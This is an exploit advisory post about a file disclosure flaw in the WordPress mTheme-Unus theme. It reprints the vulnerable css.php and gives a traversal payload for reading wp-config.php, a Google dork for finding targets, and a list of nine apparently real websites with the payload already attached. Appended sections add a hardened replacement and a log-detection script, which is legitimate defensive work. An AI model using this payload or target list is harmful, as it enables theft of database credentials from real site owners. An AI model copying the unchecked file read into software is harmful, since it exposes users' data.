WordPress mTheme-Unus Local File Inclusion
Posted Sep 30, 2015
Authored by Milad Hacking

WordPress mTheme-Unus theme versions prior to 2.3 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | 20176880b789d3d7f22d9fe6ab1f4e6e

#######################################
# Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability #
# Date: 2015-09-27
# Exploit Author: FullSecurity.org
# Google Dork: inurl:/wp-content/themes/mTheme-Unus/
# Vendor Homepage: https://wordpress.org/
# Tested on : Kali Linux
########################################
Description :
The theme's css/css.php takes a comma-separated list of file names in the
files parameter and passes each one straight to file_get_contents() with no
basename(), extension or path-containment check, so the WordPress
configuration file can be read with a request such as
site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
The file is read and echoed as text/css, not include()d, so this is arbitrary
file disclosure (database credentials, salts) rather than code execution. The
script also writes a copy of every file it reads into the theme's _cache/
directory under the web root, where it stays until a later request prunes
entries older than an hour.

# Exploit Code (the vulnerable css/css.php shipped with the theme) :

<?php
// If no file requested
if (!isset($_GET['files']) or strlen($_GET['files']) == 0) {
    header('Status: 404 Not Found');
    exit();
}

// Cache folder (relative to css/, i.e. wp-content/themes/mTheme-Unus/_cache/)
$cachePath = '../_cache/';
if (!file_exists($cachePath)) {
    mkdir($cachePath);
}

// Tell the browser what kind of data to expect
header('Content-type: text/css');

// Enable compression
if (extension_loaded('zlib')) {
    ini_set('zlib.output_compression', 'On');
}

function addExtension($file) {
    return $file;   // no extension is enforced: the name comes back untouched
}

// Calculate an unique ID of requested files & their change time.
// The list comes straight from the query string: no basename(), no extension
// check, no containment check, so "../../../../wp-config.php" passes through.
$files = array_map('addExtension', explode(',', $_GET['files']));
$md5 = '';
foreach ($files as $file) {
    $filemtime = @filemtime($file);
    $md5 .= date('YmdHis', $filemtime ? $filemtime : NULL).$file;
}
$md5 = md5($md5);

// If cache exists of this files/time ID
if (file_exists($cachePath.$md5)) {
    readfile($cachePath.$md5);
} else {
    // Load files: each attacker-controlled path is read verbatim
    error_reporting(0);
    $content = '';
    foreach ($files as $file) {
        $content .= file_get_contents($file);
    }

    // Remove comments
    $content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $content);

    // Remove tabs, spaces, newlines, etc...
    $content = str_replace(array("\r", "\n", "\t", '', ' '), '', $content);

    // Delete cache files older than an hour
    $oldDate = time()-3600;
    $cachedFiles = scandir($cachePath);
    foreach ($cachedFiles as $file) {
        $filemtime = @filemtime($cachePath.$file);
        if (strlen($file) == 32 and ($filemtime === false or $filemtime < $oldDate)) {
            unlink($cachePath.$file);
        }
    }

    // Write cache file: a copy of whatever was read lands under the web root
    file_put_contents($cachePath.$md5, $content);

    // Output
    echo $content;
}
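The following is an added hardened replacement for the css.php above. It is example code written for this page, not the theme's own fix (the advisory says 2.3 is not affected but does not show how the vendor changed the file). It assumes that css.php lives in the theme's css/ directory and that the only legitimate inputs are .css files in that same directory: every requested name is reduced to a basename, required to match a strict .css pattern, resolved with realpath() and then checked to sit directly inside that directory, so "../../../../wp-config.php" is rejected before any filesystem read.

```php
<?php
// Added example: hardened equivalent of the mTheme-Unus css/css.php
// concatenator. Not the theme's code. Assumptions: this file is in the
// theme's css/ directory and only .css files from that directory are valid.

declare(strict_types=1);

// Returns the canonical path of a legitimate css file, or null to reject.
function resolve_css_file(string $requested, string $baseDir): ?string
{
    // Anything with a directory component or a NUL byte is rejected outright.
    if ($requested === ''
        || $requested !== basename($requested)
        || strpos($requested, "\0") !== false) {
        return null;
    }
    // Allow-list the name shape: letters, digits, dot, dash, underscore, .css suffix.
    if (!preg_match('/^[A-Za-z0-9._-]+\.css$/', $requested)) {
        return null;
    }
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path: must be directly under $baseDir
    // (this also defeats symlinks pointing outside the directory).
    if (dirname($real) !== $baseDir) {
        return null;
    }
    return $real;
}

$baseDir = realpath(__DIR__);
if ($baseDir === false) {
    http_response_code(500);
    exit;
}

if (!isset($_GET['files']) || !is_string($_GET['files']) || $_GET['files'] === '') {
    http_response_code(404);
    exit;
}

// Fail closed: one bad name rejects the whole request instead of being skipped.
$files = [];
foreach (explode(',', $_GET['files']) as $name) {
    $path = resolve_css_file(trim($name), $baseDir);
    if ($path === null) {
        http_response_code(400);
        exit;
    }
    $files[] = $path;
}

header('Content-Type: text/css');

$content = '';
foreach ($files as $path) {
    $content .= file_get_contents($path);
}
// Same minification as the original: strip /* */ comments and line breaks.
$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '', $content);
$content = str_replace(["\r", "\n", "\t"], '', $content);
echo $content;
```

The on-disk cache has been dropped deliberately: in the original it writes a copy of whatever was read into wp-content/themes/mTheme-Unus/_cache/ under the web root, so on a site that was exposed that directory should be inspected and cleared as part of the response, not just the script replaced.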

########################################

Demo :

http://rmg-saintpierre.re/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.onaboosters.com//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.springschiropractic.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.superfrugalstephanie.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.mentortechgroup.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.uybbaseball.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.newmobility.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

http://www.storage4you.co.nz/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
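The requests above all share one shape: a hit on the theme's css/css.php whose files= parameter carries a parent-directory component. The following added example (written for this page, not part of the advisory) flags such attempts in combined-format web server access logs, including the comma-separated and double-URL-encoded variants css.php would still accept. The log lines in it are constructed for the example, not real traffic; the host and client addresses are documentation ranges.

```php
<?php
// Added example, not from the advisory or the theme: detect mTheme-Unus
// css.php traversal attempts in Apache/nginx combined-format access logs.
// Usage: php detect_mtheme.php [access.log]; with no argument it scans the
// constructed sample lines below.

declare(strict_types=1);

function is_mtheme_traversal(string $logLine): bool
{
    // Pull the request target out of the quoted request line.
    if (!preg_match('~"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/~', $logLine, $m)) {
        return false;
    }
    $url = parse_url($m[1]);
    if ($url === false || !isset($url['path'], $url['query'])) {
        return false;
    }
    if (!preg_match('~/wp-content/themes/mTheme-Unus/css/css\.php$~i', $url['path'])) {
        return false;
    }
    parse_str($url['query'], $params);   // parse_str URL-decodes once
    if (!isset($params['files']) || !is_string($params['files'])) {
        return false;
    }
    // css.php splits files= on commas, so every element must be tested.
    foreach (explode(',', $params['files']) as $name) {
        $name = rawurldecode($name);      // second decode catches %252e%252e
        $name = str_replace('\\', '/', $name);
        if ($name !== '' && $name[0] === '/') {
            return true;                  // absolute path
        }
        if (preg_match('~(^|/)\.\.(/|$)~', $name)) {
            return true;                  // parent-directory component
        }
    }
    return false;
}

// Constructed sample log lines: two attack attempts, two benign requests.
$sampleLog = [
    '203.0.113.5 - - [27/Sep/2015:10:12:01 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 200 1843 "-" "curl/7.38.0"',
    '203.0.113.5 - - [27/Sep/2015:10:12:09 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=style.css,%252e%252e/%252e%252e/%252e%252e/%252e%252e/wp-config.php HTTP/1.1" 200 1843 "-" "curl/7.38.0"',
    '198.51.100.7 - - [27/Sep/2015:10:13:44 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=style.css,responsive.css HTTP/1.1" 200 912 "https://example.com/" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Sep/2015:10:13:45 +0000] "GET /wp-content/themes/mTheme-Unus/style.css HTTP/1.1" 200 4411 "https://example.com/" "Mozilla/5.0"',
];

$lines = ($argc > 1) ? file($argv[1], FILE_IGNORE_NEW_LINES) : $sampleLog;
foreach ($lines as $line) {
    if (is_mtheme_traversal($line)) {
        echo "TRAVERSAL  ", $line, "\n";
    }
}
```

A 200 status on a flagged line means the server handed the file over; a 404 only tells you the theme was not installed at that path. Because the original script caches what it reads, a hit followed by requests for /wp-content/themes/mTheme-Unus/_cache/ is worth treating as the same incident.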

########################################

Special Thanks To: Hack-By-Iran, Milad Hacking, iliya Norton, Parisa, Netc4t

Ya Hossein <3

© 2018 Packet Storm. All rights reserved.